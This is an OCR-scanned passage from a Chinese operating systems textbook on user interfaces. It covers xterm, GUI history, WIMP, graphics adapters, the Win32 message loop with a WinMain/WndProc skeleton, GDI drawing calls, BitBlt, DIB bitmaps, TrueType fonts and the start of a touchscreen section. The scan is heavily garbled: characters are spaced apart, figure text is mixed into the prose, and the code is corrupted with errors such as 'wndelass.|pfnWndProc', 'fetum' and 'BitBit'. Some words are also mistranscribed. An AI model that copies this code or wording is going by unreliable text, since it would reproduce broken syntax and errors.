值得 一 提 的 是 ， 并 非 每 个 人 都 喜欢 GUI。 许 多 程序 员 更 喜欢 上 面 5.6.1 节 讨论 的 那 种 传统 的 面向 命令 
行 的 界面 。X 通 过 一 个 称 为 xterm 的 客户 程序 解决 了 这 一 问题 。 该 程序 仿真 了 一 台 古 老 的 VT102 智 能 终端 ， 
完全 具有 所 有 的 转 义 序列 。 因 此 ,编辑 器 (例如 vi 和 emacs) 以 及 其 他 使 用 termcap 的 软件 无 需 修改 就 可 
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以 在 这 些 窗口 中 工作 。 

3. 图 形 用 户 界面 

大 多 数 个 人 计算 机 提供 了 GUI (Graphical User Interface， 图 形 用 户 界面 )。 首 字母 缩写 词 GUI 的 发 
HE “gooey”, 

GUI 是 由 斯 坦 福 研究 院 的 Douglas Engelbart 和 他 的 研究 小 组 发 明 的 。 之 后 GUI 被 Xerox PARC 的 研究 
人 员 模 仿 。 在 一 个 风 和 日 丽 的 日 子 ，Apple 公 司 的 共同 创立 者 Steve Jobs 参 观 了 PARC， 并 且 在 一 台 Xerox 
计算 机 上 见 到 了 GUI。 这 使 他 产生 了 开发 一 种 新 型 计算 机 的 想法 ， 这 种 新 型 计算 机 就 是 Apple Lisa, Lisa 
因为 太 过 昂贵 因而 在 商业 上 是 失败 的 ， 但 是 它 的 后 继 者 Macintosh 获 得 了 巨大 的 成 功 。 

当 Microsoft 得 到 Macintosh 的 原型 从 而 能 够 在 其 上 开发 Microsoft Office 时 ，Microsoft 请 求 Apple 发 放 
界面 许可 给 所 有 新 来 者 ， 这 样 Macintosh 就 能 够 成 为 新 的 业界 标准 。(Microsoft 从 Office 获 得 了 比 MS- 
DOS 多 得 多 的 收入 ， 所 以 它 愿意 放弃 MS-DOS 以 获得 更 好 的 平台 用 于 Office。) Apple 负 责 Macintosh 的 主 
Jean-Louis Gassée 拒 绝 了 Microsoft 的 请 求 ， 并 且 Steve Jobs 已 经 离开 了 Apple 而 不 能 否决 他 。 最 终 ， 
Microsoft 得 到 了 界面 要 素 的 许可 证 ， 这 形成 了 Windows 的 基础 。 当 Microsoft 开 始 追 上 Apple 时 ，Apple 提 
起 了 对 Microsoft 的 诉讼 ， 声 称 Microsoft 超 出 了 许可 证 的 界限 ， 但 是 法 官 并 不 认可 ， 并 且 Windows 继 续 追 
赶 并 超过 了 Macintosh。 如 果 Gassée 同 意 Apple 内 部 许多 人 的 看 法 (他 们 也 希望 将 Macintosh 软 件 许可 给 任 
何人 )， 那 么 Apple 或 许 会 因为 许可 费 而 变 得 无 限定 有， 并 且 现 在 就 不 会 存在 Windows 了。 

暂时 搬 开 触摸 屏 使 能 的 接口 不 谈 ，GUI 具 有 用 字符 WIMP 表 示 的 四 个 基本 要 素 ， 这 些 字母 分 别 代表 
窗口 (Window)、 图 标 (Icon) 、 菜 单 (Menu) 和 定点 设备 (Pointing device)。 窗 口 是 一 个 矩形 块 状 的 
屏幕 区 域 ， 用 来 运行 程序 。 图 标 是 小 符号 ， 可 以 在 其 上 点 击 导致 某 个 动作 发 生 。 菜 单 是 动作 列表 ， 人 们 
可 以 从 中 进行 选择 。 最 后 ， 定 点 设备 是 鼠标 、 轨 迹 球 或 者 其 他 硬件 设备 ， 用 来 在 屏幕 上 移动 光标 以 便 选 
择 项 目 。 

GUI 软件 可 以 在 用 户 级 代码 中 实现 (如 UNIX 系 统 所 做 的 那样 ) ， 也 可 以 在 操作 系统 中 实现 (An 
Windows 的 情况 ) 。 

GUI 系统 的 输入 仍然 使 用 键盘 和 鼠标 ， 但 是 输出 几乎 总 是 送 往 特 殊 的 硬件 电路 板 ， 称 为 图 形 适 配器 
(graphics adapter) 。 图 形 适配器 包含 特殊 的 内 存 ， 称 为 视频 RAM (video RAM) ， 它 保存 出 现在 屏幕 上 的 
图 像 。 图 形 适 配器 通常 具有 强大 的 32 位 或 64 位 CPU 和 多 达 1GB 自 己 的 RAM， 独 立 于 计算 机 的 主 存 。 

每 个 图 形 适配器 支持 几 种 屏幕 尺寸 。 常 见 的 尺寸 (水平 x 垂直 像素 ) 是 1280 x 960、1600 x 1200, 
1920 x 1080, 2560 x 1600 和 3840 x 2160。 事 实 上， 许多 分 辩 率 的 宽 高 比 都 是 4:3， 符 合 NTSC 和 PAL 电 视 
机 的 屏幕 宽 高 比 ， 因 此 在 把 相同 的 监视 器 用 作 电 视 机 时 可 以 产生 正方 形 的 像素 。 更 高 的 分 辩 率 意 在 用 于 
宽屏 监视 器 上 ， 它 的 宽 高 比 与 这 一 分 辩 率 相 匹配 。 假 设 某 显示 器 的 分 辩 率 是 1920 x 1080 (全 高 清 视频 的 
尺寸 )， 每 个 像素 具有 24 位 的 色彩 ， 只 是 保存 图 像 就 需要 大 约 6.5MB 的 RAM， 所 以 ， 拥 有 256MB 或 更 多 
的 RAM， 图 形 适配器 就 能 够 一 次 保存 许多 图 像 。 如 果 整 个 屏幕 每 秒 刷新 75 次 ， 那 么 视频 RAM 必 须 能 够 
连续 地 以 每 种 445MB 的 速率 发 送 数据 。 

GUI 的 输出 软件 是 一 个 巨大 的 主题 。 单 是 关于 Windows GUI 就 写 下 了 许多 1500 多 页 的 书 (例如 
Petzold, 2013; Rector 和 Newcomer，1997; Simon，1997)。 显 然 ， 在 这 一 小 节 中 ， 我 们 只 可 能 浅 尝 其 
表面 并 且 介 绍 少许 基本 的 概念 。 为 了 使 讨论 具体 化 ， 我 们 将 描述 Win32 API， 它 被 Windows 的 所 有 32 位 
版 本 所 支 特 。 在 一 般 意义 上 ， 其 他 GUI 的 输出 软件 大 体 上 是 相似 的 ， 但 是 细节 过 然 不 同 。 

屏幕 上 的 基本 项 目 是 一 个 矩形 区 域 ， 称 为 窗口 (window) 。 窗 口 的 位 置 和 大 小 通过 给 定 两 个 斜 对 角 
的 坐标 (以 像素 为 单位 ) 唯一 地 决定 。 窗 口 可 以 包含 一 个 标题 栏 、 一 个 菜单 栏 、 一 个 工具 栏 、 一 个 垂直 
滚动 条 和 一 个 水 平 滚动 条 。 和 典型 的 窗口 如 图 5-35 所 示 。 注 意 ，Windows 的 坐标 系 将 原点 置 于 左上 角 并 且 y 
向 下 增长 ， 这 不 同 于 数学 中 使 用 的 笛 卡 儿 坐 标 。 

当 窗 口 被 创建 时 ， 有 一 些 参 数 可 以 设 定 窗口 是 否 可 以 被 用 户 移动 ， 是 否 可 以 被 用 户 调整 大 小 ， 或 者 
是 否 可 以 被 用 户 滚动 (通过 拖 动 滚动 条 ) 。 大 多 数 程序 产生 的 主 窗口 可 以 被 移动 、 调 整 大 小 和 滚动 ， 这 
对 于 Windows 程 序 的 编写 方式 具有 重大 的 意义 。 特 别 地 ， 程 序 必须 被 告知 关于 其 窗口 大 小 的 改变 ， 并 且 
必须 准备 在 任何 时 刻 重 画 其 窗口 的 内 容 ， 即 使 在 程序 最 不 期 望 的 时 候 。 
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图 5-35 XGA 显示 器 上 位 于 (200, 100) 处 的 一 个 窗口 样 例 


因此 ，Windows 程 序 是 面向 消息 的 。 涉 及 键盘 和 鼠标 的 用 户 操作 被 Windows 所 捕获 ， 并 且 转 换 成 消 
息 ， 送 到 正在 被 访问 的 窗口 所 属于 的 程序 。 每 个 程序 都 有 一 个 消息 队列 ， 与 程序 的 所 有 窗口 相关 的 消息 
都 被 发 送 到 该 队列 中 。 程 序 的 主 循环 包括 提取 下 一 条 消息 ， 并 且 通 过 调用 针对 该 消息 类 型 的 内 部 过 程 对 
其 进行 处 理 。 在 某 些 情况 下 ，Windows 本 身 可 以 绕 过 消息 队列 而 直接 调用 这 些 过 程 。 这 一 模型 与 UNIX 的 
过 程 化 代码 模型 完全 不 同 ，UNIX 模 型 是 提请 系统 调用 与 操作 系统 相互 作用 的 。 然 而 ，X 是 面向 事件 的 。 

为 了 使 这 一 编程 模型 更 加 清晰 ， 请 考虑 图 5-36 的 例子 。 在 这 里 我 们 看 到 的 是 Windows 主 程序 的 框架 ， 
它 并 不 完整 并 且 没 有 做 错误 检查 ， 但 是 对 于 我 们 的 意图 而 言 它 显示 了 足够 的 细节 。 程 序 的 开头 包含 一 个 
头 文件 windows.h， 它 包含 许多 宏 、 数 据 类 型 、 常 数 、 函 数 原型 ， 以 及 Windows 程 序 所 需要 的 其 他 信息 。 

主 程序 以 一 个 声明 开始 ， 该 声明 给 出 了 它 的 名 字 和 参数 。WINAPI 宏 是 一 条 给 编译 器 的 指令 ， 让 编 
译 器 使 用 一 定 的 参数 传递 约定 并 且 不 需要 我 们 进一步 关心 。 第 一 个 参数 h 是 一 个 实例 句柄 ， 用 来 向 系统 
的 其 他 部 分 标识 程序 。 在 某 种 程度 上 ，Win32 是 面向 对 象 的 ， 这 意味 着 系统 包含 对 象 〈 例 如 程序 、 文 件 
和 窗口 )。 对 象 具 有 状态 和 相关 的 代码 ， 而 相关 的 代码 称 为 方法 (method) ， 它 对 于 状态 进行 操作 。 对 象 
是 使 用 句柄 来 引用 的 ， 在 该 示例 中 ，h 标 识 的 是 程序 。 第 二 个 参数 只 是 为 了 向 后 兼容 才 出 现 的 ， 它 已 不 
再 使 用 。 第 三 个 参数 szCmd 是 一 个 以 零 终止 的 字符 串 ， 包 含 启动 该 程序 的 命令 行 ， 即 使 程序 不 是 从 命令 
行 启动 的 。 第 四 个 参数 ICmdShow 表 明 程 序 的 初始 窗口 应 该 占据 整个 屏幕 ， 占 据 屏 幕 的 一 部 分 ， 还 是 一 
点 也 不 占据 屏幕 (只 是 占据 任务 条 ) 。 

该 声明 说 明了 一 个 广泛 采用 的 Microsoft 约 定 ， 称 为 匈牙利 表示 法 (Hungarian notation)。 该 名 称 是 
一 个 涉及 波兰 表示 法 的 双关 语 ， 波 兰 表 示 法 是 波兰 逻辑 学 家 J. Lukasiewicz 发 明 的 后 缀 系统 ， 用 于 不 使 用 
优先 级 和 括号 表示 代数 公式 。 匈 牙 利 表示 法 是 Microsoft 的 一 名 匈牙利 程序 员 Charles Simonyi 发 明 的 ， 它 
使 用 标识 符 的 前 几 个 字符 来 指定 类 型 。 允 许 的 字母 和 类 型 包括 c (character, FF), w (word, Ff, Bl 
在 意 指 无 符号 16 位 整数 )、i (integer，32 位 有 符号 整数 )、1 (long， 也 是 一 个 32 位 有 符号 整数 ) s 
(string， 字 符 串 )、sz (string terminated by a zero byte, UF HAILEA), p (pointer， 指 针 )、 
fn (function， 函 数 ) 和 h (handle， 句 柄 ) 。 因 此 ， 举 例 来 说 ，szCmd 是 一 个 以 零 终止 的 字符 串 并 且 
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iCmdShow 是 一 个 整数 。 许 多 程序 员 认为 在 变量 名 中 像 这 样 对 类 型 进行 编码 没有 什么 价值 ， 并 且 使 
Windows 代 码 异常 地 难于 阅读 。 在 UNIX 中 就 没有 类 似 这 样 的 约定 。 


#include <windows.h> 
int WINAPI WinMain(HINSTANCE h, HINSTANCE, hprev, char *szCmd, int iCmdShow) 
{ 


WNDCLASS wndclass; /* 本 窗 日 的 类 对 象 */ 
MSG msg; /* 进入 的 消息 存放 在 这 里 */ 
HWND hwnd; /* MRNA (指针 ) */ 


/* ayee{twndclass*/ fx: k 
wndelass.|pfnWndProc = WndProc; /* 指 示 调用 哪个 过 程 */ 
wndclass.lpszClassName = "Program name"; /* 标题 条 的 文本 */ 
wndclass.hlcon = Loadicon(NULL, IDI_APPLICATION); /* 装载 程序 图 标 */ 
wndclass.hCursor = LoadCursor(NULL, IDC_ARROW); j» 装载 鼠标 光标 */ 


RegisterClass(&wndclass); /* 向 Windows 注 册 wndclass */ 
hwnd = CreateWindow ( ... ) /# 为 窗口 分 配 存储 */ 
ShowWindow(hwnd, iCmdShow); /* 在 屏幕 上 显示 窗口 */ 
UpdateWindow(hwnd); 人 # 指示 窗口 绘制 自身 */ 


while (GetMessage(&msg, NULL, 0, 0)) { /* 从 队列 中 获取 消息 */ 
TranslateMessage(&msg); /* 转换 消息 */ 


DispatchMessage(&msg);  /* 将 msg 发 送 给 适当 的 过 程 */ 


return(msg.wParam); 


} 


long CALLBACK WndProc(HWND hwnd, UINT message, UINT wParam, long IParam) 
/* k FAL ee FH] */ 


switch (message) { 
case WM_CREATE: ...; return...; /* 创建 窗口 */ 
case WM_PAINT: .…; fetum..; /* 重 绘 窗口 的 内 容 */ 
case WM_DESTROY: ...; return …;  /* 销 般 窗口 */ 


} 
return(DefWindowProc(hwnd, message, wParam, IParam));/* 默认 */ 





图 5-36 Windows 主 程序 的 框架 


每 个 窗口 必须 具有 一 个 相关 联 的 类 对 象 定 义 其 属性 ， 在 图 5-36 中 ， 类 对 象 是 wndclass。 对 象 类 型 
WNDCLASS 具 有 10 个 字段 ， 其 中 4 个 字段 在 图 5-36 中 被 初始 化 ， 在 一 个 以 实际 的 程序 中 ， 其 他 6 个 字段 
也 要 被 初始 化 。 最 重要 的 字段 是 lpfnWndProc， 它 是 一 个 指向 函数 的 长 ( 即 32 位 ) 指针 ， 该 函数 处 理 引 
向 该 窗口 的 消息 。 此 处 被 初始 化 的 其 他 字段 指出 在 标题 条 中 使 用 哪个 名 字 和 图 标 ， 以 及 对 于 鼠标 光标 使 
用 哪个 符号 。 

在 wndclass 被 初始 化 之 后 ，RegisterClass 被 调用 ， 将 其 发 送 给 Windows。 特 别 地 ， 在 该 调用 之 后 
Windows 就 会 知道 当 各 种 事件 发 生 时 要 调用 哪个 过 程 。 下 一 个 调用 CreateWindow 为 窗口 的 数据 结构 分 配 
内 存 并 且 返 回 一 个 句柄 以 便 以 后 引用 它 。 然 后 ， 程 序 做 了 另外 两 个 调用 ， 将 窗口 轮廓 置 于 屏幕 之 上 ， 并 
且 最 终 完 全 地 填充 窗口 。 

此 刻 我 们 到 达 了 程序 的 主 循环 ， 它 包括 获取 消息 ， 对 消息 做 一 定 的 转换 ， 然 后 将 其 传 回 Windows 以 
便 让 Windows 调 用 WndProc 来 处 理 它 。 要 回答 这 一 完整 的 机 制 是 否 能 够 得 到 化 简 的 问题 ， 答 案 是 肯定 的 ， 
但 是 这 样 做 是 由 于 历史 的 缘故 ， 并 且 我 们 现在 坚持 这 样 做 。 

主 循环 之 后 是 过 程 WndProc， 它 处 理发 送 给 窗口 的 各 种 消息 。 此 处 CALLBACK 的 使 用 与 上 面 的 
WINAPI 相 类 似 ， 为 参数 指明 要 使 用 的 调用 序列 。 第 一 个 参数 是 要 使 用 的 窗口 的 句柄 。 第 二 个 参数 是 消 
息 类 型 。 第 三 和 第 四 个 参数 可 以 用 来 在 需要 的 时 候 提供 附加 的 信息 。 

消息 类 型 WM_CREATE 和 WM_DESTROY 分 别 在 程序 的 开始 和 结束 时 发 送 。 它 们 给 程序 机 会 为 数 
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据 结构 分 配 内 存 ， 并 且 将 其 返回 。 

第 三 个 消息 类 型 WM_PAINT 是 一 条 指令 ， 让 程序 填充 窗口 。 它 不 仅 当 窗 口 第 一 次 绘制 时 被 调用 ， 而 
且 在 程序 执行 期 间 也 经 常 被 调用 。 与 基于 文本 的 系统 相反 ， 在 Windows 中 程序 不 能 够 假定 它 在 屏幕 上 画 
的 东西 将 一 直 保持 在 那里 直到 将 其 删除 。 其 他 窗口 可 能 会 被 拖拉 到 该 窗口 的 上 面 ， 菜 单 可 能 会 在 窗口 上 
被 拉 下 ， 对 话 框 和 工具 提示 可 能 会 覆盖 窗口 的 某 一 部 分 ， 如 此 等 等 。 当 这 些 项 目 被 移 开 后 ， 窗 口 必须 重 
绘 。Windows 告 知 一 个 程序 重 绘 窗口 的 方法 是 发 送 WM_PAINT 消 息 。 作 为 一 种 友好 的 姿态 ， 它 还 会 提供 
窗口 的 哪 一 部 分 曾经 被 覆盖 的 信息 ， 这 样 程序 就 更 加 容易 重新 生成 窗口 的 那 一 部 分 而 不 必 从 零 开 始 重 绘 
整个 窗口 。 

Windows 有 两 种 方法 可 以 让 一 个 程序 做 某 些 事情 。 一 种 方法 是 投递 一 条 消息 到 其 消息 队列 。 这 种 方 
法 用 于 键盘 输入 、 鼠 标 输入 以 及 定时 器 到 时 。 另 一 种 方法 是 发 送 一 条 消息 到 窗口 ， 从 而 使 Windows 直 接 
调用 WndProc 本 身 。 这 一 方法 用 于 所 有 其 他 事件 。 由 于 当 一 条 消息 完全 被 处 理 后 Windows 会 得 到 通报 ， 
这 样 Windows 就 能 够 避免 在 前 一 个 调用 完成 前 产生 新 的 调用 ， 由 此 可 以 避免 竞争 条 件 。 

还 有 许多 其 他 消息 类 型 。 当 一 个 不 期 望 的 消息 到 达 时 为 了 避免 异常 行为 ， 最 好 在 WndProc 的 结尾 处 
调用 DefWindowProc， 让 默认 处 理 过 程 处 理 其 他 情形 。 

总 之 ，Windows 程 序 通常 创建 一 个 或 多 个 窗口 ， 每 个 窗口 具有 一 个 类 对 象 。 与 每 个 程序 相关 联 的 是 
一 个 消息 队列 和 一 组 处 理 过 程 。 最 终 ， 程 序 的 行为 由 到 来 的 事件 驱动 ， 这 些 事件 由 处 理 过 程 来 处 理 。 与 
UNIX 采 用 的 过 程 化 观点 相 比 ， 这 是 一 个 完全 不 同 的 世界 观 模 型 。 

对 屏幕 的 实际 绘图 是 由 包含 几 百 个 过 程 的 程序 包 处理 的 ， 这 些 过 程 捆 在 一 起 形成 了 GDI (Graphics 
Device Interface， 图 形 设备 接口 )。 它 能 够 处 理 文本 和 各 种 类 型 的 图 形 ， 并 且 被 设计 成 与 平台 和 设备 无 
关 的 。 在 一 个 程序 可 以 在 窗口 中 绘图 ( 即 绘画 ) 之 前 ， 它 需要 获取 一 个 设备 上 下 文 (device context); 
设备 上 下 文 是 一 个 内 部 数据 结构 ， 包 含 窗口 的 属性 ， 诸 如 当前 字体 、 文 本 颜色 、 背 景 颜色 等 。 大 多 数 
GDI 调 用 使 用 设备 上 下 文 ， 不 管 是 为 了 绘图 ， 还 是 为 了 获取 或 设置 属性 。 

有 许 许多 多 的 方法 可 用 来 获取 设备 上 下 文 。 下 面 是 一 个 获取 并 使 用 设备 上 下 文 的 简单 例子 : 

hdc=GetDC(hwnd); 

TextOut(hdc, x, y, psText, iLength); 

ReleaseDC(hwnd, hdc); 


第 一 条 语句 获取 一 个 设备 上 下 文 的 句柄 hdc。 第 二 条 语句 使 用 设备 上 下 文 在 屏幕 上 写 一 行文 本 ， 该 
语句 设 定 了 字符 串 开始 处 的 (x, y) 坐标 、 一 个 指向 字符 串 本 身 的 指针 以 及 字符 串 的 长 度 。 第 三 个 调用 
释放 设备 上 下 文 ， 表 明 程 序 在 当时 已 通过 了 绘图 操作 。 注 意 ，hdc 的 使 用 方式 与 UNIX 的 文件 描述 符 相 类 
似 。 还 需要 注意 的 是 ，ReleaseDC 包 含 元 余 的 信息 〈 使 用 hdc 就 可 以 唯一 地 指定 一 个 窗口 )。 使 用 不 具有 
实际 价值 的 元 余 信 息 在 Windows 中 是 很 常见 的 。 

另 一 个 有 趣 的 注意 事项 是 ， 当 hdc 以 这 样 的 方式 被 获取 时 ， 程 序 只 能 够 写 窗口 的 客户 区 ， 而 不 能 写 
标题 条 和 窗口 的 其 他 部 分 。 在 内 部 ， 在 设备 上 下 文 的 数据 结构 中 ， 维 护 着 一 个 裁剪 区 域 。 在 修剪 区 域 之 
外 的 任何 绘图 操作 都 将 被 忽略 。 然 而 ， 存 在 着 另 一 种 获取 设备 上 下 文 的 方法 GetWindowDC ， 它 将 修剪 
区 域 设置 为 整个 窗口 。 其 余 的 调用 以 其 他 的 方法 限定 修剪 区 域 。 拥 有 多 种 调用 做 几乎 相同 的 事情 是 
Windows 的 另 一 个 特性 。 

GDI 的 完全 论述 超出 了 这 里 讨论 的 范围 。 对 于 感 兴趣 的 读者 ， 上 面 引 用 的 参考 文献 提供 了 补充 的 信 
息 。 然 而 ， 关 于 GDI 可 能 还 值得 再 说 几 句 话 ， 因 为 GDI 是 如 此 之 重要 。GDI 具 有 各 种 各 样 的 过 程 调 用 以 
获取 和 释放 设备 上 下 文 ， 获 取 关 于 设备 上 下 文 的 信息 ， 获 取 和 设置 设备 上 下 文 的 属性 (例如 背景 颜色 )， 
使 用 GDI 对 象 〈 例 如 画笔 、 画 刷 和 字体 ， 其 中 每 个 对 象 都 有 自己 的 属性 ) 。 最 后 ， 当 然 存在 许多 实际 在 
屏幕 上 绘图 的 GDI 调 用 。 

绘图 过 程 分 成 四 种 类 型 : 绘制 直线 和 曲线 、 绘 制 填充 区 域 、 管 理 位 图 以 及 显示 文本 。 我 们 在 上 面 看 
到 了 绘制 文本 的 例子 ， 所 以 让 我 们 快速 地 看 看 其 他 类 型 之 一 。 调 用 

Rectangle(hdc, xleft, ytop, xright, ybottom); 


将 绘制 一 个 填充 的 矩形 ， 它 的 左上 角 和 右 下 角 分 别 是 (xleft, ytop) 和 (xright, ybottom) 。 例 如 ， 
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Rectangle(hdc,2,1,6,4); 


将 绘制 一 个 如 图 5-37 所 示 的 矩形 。 线 宽 和 颜色 以 及 填充 颜色 取 
自 设 备 上 下 文 。 其 他 的 GDI 调 用 在 形式 上 是 类 似 的 。 

4. 位 图 

GDI 过 程 是 矢量 图 形 学 的 实例 。 它 们 用 于 在 屏幕 上 放置 几 
何 图 形 和 文本 。 它 们 能 够 十 分 容易 地 缩放 到 较 大 和 较 小 的 屏幕 
(如 果 屏 幕 上 的 像素 数 是 相同 的 ) 。 它 们 还 是 相对 设备 无 关 的 。 
一 组 对 GDI 过 程 的 调用 可 以 聚集 在 一 个 文件 中 ， 描 述 一 个 复杂 
的 图 画 。 这 样 的 文件 称 为 Windows 元 文件 (metafile) ， 广 泛 地 
用 于 从 一 个 Windows 程 序 到 另 一 个 Windows 程 序 传送 图 画 。 这 
样 的 文件 具有 扩展 名 .wmf。 图 5-37 使 用 Rectangle 绘 制 矩形 的 例 

许多 Windows 程 序 允 许 用 户 复 制图 画 (或 一 部 分 ) 并 且 放 子 。 每 个 方 框 代表 一 个 像素 
在 Windows 的 剪贴 板 上 ， 然 后 用 户 可 以 转 入 另 一 个 程序 并 且 粘 
贴 剪 贴 板 的 内 容 到 另 一 个 文档 中 。 做 这 件 事 的 一 种 方法 是 由 第 一 个 程序 将 图 画 表示 为 Windows 元 文件 并 
且 将 其 以 .wmf 格 式 放 在 剪贴 板 上 。 此 外 ， 还 有 其 他 的 方法 做 这 件 事 。 

并 不 是 计算 机 处 理 的 所 有 图 像 都 能 够 使 用 矢量 图 形 学 来 生成 。 例 如 ， 照 片 和 视频 就 不 使 用 矢量 图 形 
学 。 反 之 ， 这 些 项 目 可 以 通过 在 图 像 上 覆盖 一 层 网 格 扫描 输入 。 每 一 个 网 格 方块 的 平均 红 、 绿 、 蓝 取 值 被 
采样 并 且 保存 为 一 个 像素 的 值 。 这 样 的 文件 称 为 位 图 (bitmap)。Windows 中 有 大 量 的 工具 用 于 处 理 位 图 。 

位 图 的 另 一 个 用 途 是 用 于 文本 。 在 某 种 字体 中 表示 一 个 特殊 字符 的 一 种 方法 是 将 其 表示 为 小 的 位 图 。 
于 是 往 屏幕 上 添加 文本 就 变 成 移动 位 图 的 事情 。 

使 用 位 图 的 一 种 常规 方法 是 通过 调用 BitBlt 过 程 ， 该 过 程 调 用 如 下 : 

BitBlt(dsthdc, dx, dy, wid, ht, srchdc, sx, sy, rasterop); 

在 其 最 简单 的 形式 中 ， 该 过 程 从 一 个 窗口 中 的 一 个 矩形 复制 位 图 到 另 一 个 窗口 〈 或 同一 个 窗口 ) 的 
一 个 矩形 中 。 前 三 个 参数 设 定 目标 窗口 和 位 置 ， 然 后 是 宽度 和 高 度 ， 接 下 来 是 源 窗口 和 位 置 。 注 意 ， 每 
个 窗口 都 有 其 自己 的 坐标 系 ，(0，0) 在 窗口 的 左上 角 处 。 最 后 一 个 参数 将 在 下 面 描述 。 

BitBit(hdc2, 1, 2, 5, 7, hdcl, 2, 2, SRCCOPY); 


的 效果 如 图 5-38 所 示 。 注 意 字 母 A 的 整个 5 x 7 区 域 被 复制 了 ， 包 括 背 景 颜 色 。 








a) b) 


图 5-38 使 用 BitBlt 复 制 位 图 : a) 复制 前 ，b) 复制 后 


除了 复制 位 图 外 ，BitBlt 还 可 以 做 很 多 事情 。 最 后 一 个 参数 提供 了 执行 布尔 运算 的 可 能 ， 从 而 可 以 
将 源 位 图 与 目标 位 图 合并 在 一 起 。 例 如 ， 源 位 图 可 以 与 目标 位 图 执行 或 运算 ， 从 而 融入 目标 位 图 ， 源 位 
图 还 可 以 与 目标 位 图 执行 异 或 运算 ， 该 运算 保持 了 源 位 图 和 目标 位 图 的 特征 。 

位 图 具有 的 一 个 问题 是 它们 不 能 缩放 。8 x 12 方 框 内 的 一 个 字符 在 640 x 480 的 显示 器 上 看 起 来 是 适 
度 的 。 然 而 ， 如 果 该 位 图 以 每 英寸 1200 点 复制 到 10 200 位 x 13 200 位 的 打印 页 面 上 ， 那 么 字符 宽度 (8 像 
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素 ) 为 8/1200 英 寸 或 0.17mm。 此 外 ， 在 具有 不 同 彩色 属性 的 设备 之 间 进 行 复 制 ， 或 者 在 单 色 设备 与 彩色 
设备 之 间 进 行 复制 效果 并 不 理想 。 

由 于 这 样 的 缘故 ，Windows 还 支持 一 个 称 为 DIB (Device Independent Bitmap， 设 备 无 关 的 位 图 ) 
的 数据 结构 。 采 用 这 种 格式 的 文件 使 用 扩展 名 .bmp。 这 些 文件 在 像素 之 前 具有 文件 与 信息 头 以 及 一 个 颜 
色 表 ， 这 样 的 信息 使 得 在 不 同 的 设备 之 间 移 动 位 图 十 分 容易 。 

5. 字体 

在 Windows 3.1 版 之 前 的 版 本 中 ， 字 符 表示 为 位 图 ， 并 且 使 用 BitBlt 复 制 到 屏幕 上 或 者 打印 机 上 。 这 
样 做 的 问题 是 ， 正 如 我 们 刚刚 看 到 的 ， 在 屏幕 上 有 意义 的 位 图 对 于 打印 机 来 说 太 小 了 。 此 外 ， 对 于 每 一 
尺寸 的 每 个 字符 ， 需 要 不 同 的 位 图 。 换 句 话说 ， 给 定 字符 A 的 10 点 阵 字 型 的 位 图 ， 没 有 办 法 计算 它 的 12 
点 阵 字 型 。 因 为 每 种 字体 的 每 一 个 字符 可 能 都 需要 从 4 点 到 120 点 范围 内 的 各 种 尺寸 ， 所 以 需要 的 位 图 的 
数目 是 巨大 的 。 整 个 系统 对 于 文本 来 说 简直 是 太 笨重 了 。 

该 问题 的 解决 办 法 是 TrueType 字 体 的 引 
入 ，TrueType 字 体 不 是 位 图 而 是 字符 的 轮廓 。  20pt: abcdefgh 
每 个 TrueType 字 符 是 通过 围绕 其 周 界 的 一 系列 
点 来 定义 的 ， 所 有 的 点 都 是 相对 于 (0，0) 原 


点 。 使 用 这 一 系统 ， 放 大 或 者 缩小 字符 是 十 分 ; b d f h 
容易 的 ， 必 须要 做 的 全 部 事情 只 是 将 每 个 上 村 "°° AOCAE £ 
乘 以 相同 的 比例 因子 。 采 用 这 种 方法 ， 

TrueType 字 符 可 以 放大 或 者 缩小 到 任意 的 点 阵 


尺寸 ， 其 至 是 分 数 点 阵 尺寸 。 一 旦 给 定 了 适当 

的 尺寸 ， 各 个 点 可 以 使 用 幼儿 园 教 的 著名 的 逐 ?PE alpcdefo h 
点 连 算法 连接 起 来 (注意 现代 幼儿 园 为 了 更 加 SS 

光滑 的 结果 而 使 用 曲线 尺 ) 。 轮 廓 完成 之 后 ， 

就 可 以 填充 字符 了 。 图 5-39 给 出 了 某 些 字符 缩 图 5-39 不 同 点 阵 尺 寸 的 字符 轮廓 的 一 些 例子 
放 到 三 种 不 同 点 阵 尺 寸 的 一 个 例子 。 

一 旦 填充 的 字符 在 数学 形式 上 是 可 用 的 ， 就 可 以 对 它 进行 栅 格 化 ， 也 就 是 说 ， 以 任何 期 望 的 分 辩 率 
将 其 转换 成 位 图 。 通 过 首先 缩放 然后 栅 格 化 ， 我 们 可 以 肯定 显示 在 屏幕 上 的 字符 与 出 现在 打印 机 上 的 字 
符 将 是 尽 可 能 接近 的 ， 差 别 只 在 于 量化 误差 。 为 了 进一步 改进 质量 ， 可 以 在 每 个 字符 中 嵌入 表明 如 何 进 
行 栅 格 化 的 线索 。 例 如 ， 字 母 T 顶 端的 两 个 衬 线 应 该 是 完全 相同 的 ， 否 则 由 于 伟人 误差 可 能 就 不 是 这 样 
的 情况 了 。 这 样 的 线索 改进 了 最 终 的 外 观 。 

6. 触摸 屏 

越 来 越 多 的 屏幕 同样 还 用 做 输入 设备 ， 特 别 是 在 智能 手机 、 平 板 电脑 以 及 其 他 超 便 携 设 备 上 ， 用 手 
指 (或 者 触 笔 ) 在 屏幕 上 点 击 和 滑动 是 非常 方便 的 。 因 为 用 户 可 以 在 屏幕 上 直接 与 目标 物 进行 交互 ， 所 
以 用 户 体验 与 鼠标 类 的 设备 是 不 同 的 ， 并 且 更 加 直观 。 研 究 表明 ， 小 孩 甚 至 猩猩 以 及 其 他 灵 长 类 动物 都 
能 够 操作 基于 触摸 的 设备 。 

触摸 设备 并 不 一 定 是 屏幕 。 触 摸 设 备 分 成 两 类 : 非 透明 的 和 透明 的 。 典 型 的 非 透明 触摸 设备 是 笔记 
本 电脑 上 的 触摸 板 。 透 明 设备 的 例子 是 智能 手机 或 平板 电脑 上 的 触摸 屏 。 然 而 ， 在 本 节 中 ， 我 们 只 讨论 
触摸 屏 。 

如 同 在 计算 机 产业 中 流行 起 来 的 许多 其 他 事物 一 样 ， 触 摸 屏 并 不 是 全 新 的 东西 。 早 在 1965 年 ， 英 国 
皇家 雷达 研究 院 (British Royal Radar Establishment) 的 E. A. Johnson 就 描述 了 一 种 (电容 式 ) 触摸 显示 
器 ， 虽 然 很 简陋 ， 但 是 被 视 为 我 们 今天 所 见 到 的 显示 器 的 先驱 。 大 多 数 现代 触摸 屏 是 电阻 式 的 或 者 是 电 
容 式 的 。 

电阻 屏 (resistive screen) 顶部 有 一 层 和 柔性 的 塑料 表面 。 该 塑料 本 身 没 有 什么 特别 的 ， 只 是 比 你 家 
